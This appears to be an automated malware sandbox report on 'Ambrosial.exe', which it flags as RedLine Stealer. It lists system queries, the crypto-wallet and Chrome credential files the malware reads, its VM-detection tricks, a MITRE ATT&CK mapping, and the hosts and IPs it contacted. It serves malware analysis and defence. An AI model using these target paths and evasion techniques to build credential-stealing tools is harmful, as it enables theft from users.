              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

              Stealing of Sensitive Information:

              barindex
              Yara detected RedLine StealerShow sources
              Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 6180, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)Show sources
              Source: AppLaunch.exe, 00000004.00000002.417474499.0000000007411000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets
              Source: AppLaunch.exe, 00000004.00000002.417474499.0000000007411000.00000004.00000001.sdmpString found in binary or memory: gl1C:\Users\user\AppData\Roaming\Electrum\wallets\*
              Source: AppLaunch.exe, 00000004.00000002.417474499.0000000007411000.00000004.00000001.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx
              Source: AppLaunch.exe, 00000004.00000002.417474499.0000000007411000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: AppLaunch.exe, 00000004.00000002.417474499.0000000007411000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
              Source: AppLaunch.exe, 00000004.00000002.417474499.0000000007411000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: AppLaunch.exe, 00000004.00000002.417474499.0000000007411000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
              Source: AppLaunch.exe, 00000004.00000002.417474499.0000000007411000.00000004.00000001.sdmpString found in binary or memory: gl5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Tries to steal Crypto Currency WalletsShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 6180, type: MEMORYSTR

              Remote Access Functionality:

              barindex
              Yara detected RedLine StealerShow sources
              Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 6180, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation221DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11OS Credential Dumping1File and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection412Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery224Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery631SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing12NTDSProcess Discovery12Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion441SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading11DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion441Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection412/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 512228 Sample: Ambrosial.exe Startdate: 30/10/2021 Architecture: WINDOWS Score: 100 37 Antivirus / Scanner detection for submitted sample 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Yara detected RedLine Stealer 2->41 43 8 other signatures 2->43 7 Ambrosial.exe 3 2->7         started        process3 file4 23 C:\Users\...\turbosquad_support417981.exe, PE32 7->23 dropped 25 C:\Users\user\AppData\Local\...\Ambrosial.exe, PE32+ 7->25 dropped 10 turbosquad_support417981.exe 7->10         started        13 Ambrosial.exe 16 59 7->13         started        process5 dnsIp6 53 Query firmware table information (likely to detect VMs) 10->53 55 Tries to detect sandboxes and other dynamic analysis tools (window names) 10->55 57 Machine Learning detection for dropped file 10->57 61 5 other signatures 10->61 17 AppLaunch.exe 5 10->17         started        21 WerFault.exe 23 9 10->21         started        31 raw.githubusercontent.com 185.199.108.133, 443, 49741, 49742 FASTLYUS Netherlands 13->31 33 cdn.discordapp.com 162.159.133.233, 443, 49748, 49749 CLOUDFLARENETUS United States 13->33 35 192.168.2.1 unknown unknown 13->35 27 C:\Users\user\AppData\...behaviorgraphunaDotNetRT64.dll, PE32+ 13->27 dropped 59 Tries to detect virtualization through RDTSC time measurements 13->59 file7 signatures8 process9 dnsIp10 29 178.33.87.34, 45760, 49745 OVHFR France 17->29 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->45 47 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 17->47 49 Tries to harvest and steal browser information (history, passwords, etc) 17->49 51 Tries to steal Crypto Currency Wallets 17->51 signatures11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Ambrosial.exe39%VirustotalBrowse
              Ambrosial.exe100%AviraHEUR/AGEN.1119113
              Ambrosial.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\Ambrosial.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\0e1a63fc-9228-4b4f-96fc-fee060f96e92\GunaDotNetRT64.dll1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\0e1a63fc-9228-4b4f-96fc-fee060f96e92\GunaDotNetRT64.dll3%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\0e1a63fc-9228-4b4f-96fc-fee060f96e92\GunaDotNetRT64.dll7%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Ambrosial.exe0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              raw.githubusercontent.com0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
              http://tempuri.org/0%URL Reputationsafe
              http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id15V0%Avira URL Cloudsafe
              http://ns.adobe.c/g0%URL Reputationsafe
              http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id90%URL Reputationsafe
              http://tempuri.org/Entity/Id80%URL Reputationsafe
              http://tempuri.org/Entity/Id50%URL Reputationsafe
              http://tempuri.org/Entity/Id40%URL Reputationsafe
              http://tempuri.org/Entity/Id70%URL Reputationsafe
              http://tempuri.org/Entity/Id60%URL Reputationsafe
              http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Microsoft0%VirustotalBrowse
              http://www.jiyu-kobo.co.jp/Microsoft0%Avira URL Cloudsafe
              http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
              https://api.ip.sb/ip0%URL Reputationsafe
              http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id200%URL Reputationsafe
              http://tempuri.org/Entity/Id210%URL Reputationsafe
              http://tempuri.org/Entity/Id220%URL Reputationsafe
              http://tempuri.org/Entity/Id230%URL Reputationsafe
              http://tempuri.org/Entity/Id240%URL Reputationsafe
              http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
              http://en.w0%URL Reputationsafe
              http://tempuri.org/Entity/Id100%URL Reputationsafe
              http://tempuri.org/Entity/Id110%URL Reputationsafe
              http://tempuri.org/Entity/Id120%URL Reputationsafe
              http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id130%URL Reputationsafe
              http://tempuri.org/Entity/Id140%URL Reputationsafe
              http://tempuri.org/Entity/Id150%URL Reputationsafe
              http://tempuri.org/Entity/Id160%URL Reputationsafe
              http://tempuri.org/Entity/Id170%URL Reputationsafe
              http://tempuri.org/Entity/Id180%URL Reputationsafe
              http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id190%URL Reputationsafe
              http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id8Response0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              raw.githubusercontent.com
              185.199.108.133
              truefalseunknown
              cdn.discordapp.com
              162.159.133.233
              truefalse
                high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://cdn.discordapp.com/attachments/489891892142669842/844005578808360960/yeeee.pngfalse
                  high
                  https://cdn.discordapp.com/attachments/489891892142669842/835691740962226216/ataraxiaback.pngfalse
                    high
                    https://cdn.discordapp.com/attachments/863628606516625408/866495749909643294/ZephyrBannerIcon-nxstBX5z.pngfalse
                      high
                      https://cdn.discordapp.com/attachments/489891892142669842/835331120836378624/atani2.pngfalse
                        high
                        https://cdn.discordapp.com/attachments/489891892142669842/835660013732626522/ataniclassic.pngfalse
                          high
                          https://cdn.discordapp.com/attachments/757752473690570865/882393335279534180/zephyrNewB.pngfalse
                            high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/02/sc/sctAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabAppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=AppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpfalse
                                      high
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id12ResponseAppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id2ResponseAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id15VAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com/designersAmbrosial.exe, 00000003.00000003.553045828.000002023BEFE000.00000004.00000001.sdmpfalse
                                          high
                                          http://ns.adobe.c/gAppLaunch.exe, 00000004.00000002.414510553.000000000526D000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id21ResponseAppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                              high
                                              http://tempuri.org/Entity/Id9AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                high
                                                http://tempuri.org/Entity/Id8AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://tempuri.org/Entity/Id5AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://tempuri.org/Entity/Id4AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://tempuri.org/Entity/Id7AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://tempuri.org/Entity/Id6AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://tempuri.org/Entity/Id19ResponseAppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
